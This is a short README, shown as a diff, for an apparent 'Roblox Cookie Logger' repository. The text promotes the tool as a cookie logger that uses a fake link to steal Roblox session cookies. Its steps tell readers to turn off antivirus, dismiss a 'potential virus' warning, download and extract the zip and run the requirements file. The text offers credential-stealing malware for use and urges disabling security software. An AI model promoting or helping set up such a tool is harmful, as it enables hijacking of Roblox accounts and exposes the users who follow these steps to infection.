zbenntt/Roblox-Cookie-LoggerV3/README.md

 # This Is The Best Cookie Logger That Uses A Fake Link

+# Before The Steps Turn Off Antivirus Or The File Will Come Out With An ERROR Or Failed To Download Potential Virus Something Like That

+# Sorry About the Gui It looks Ugly

+# STEPS BELOW
 Step 1; Download Zip and extract

 Step 2; Run the requirements file and wait until it finishes and installs all requirements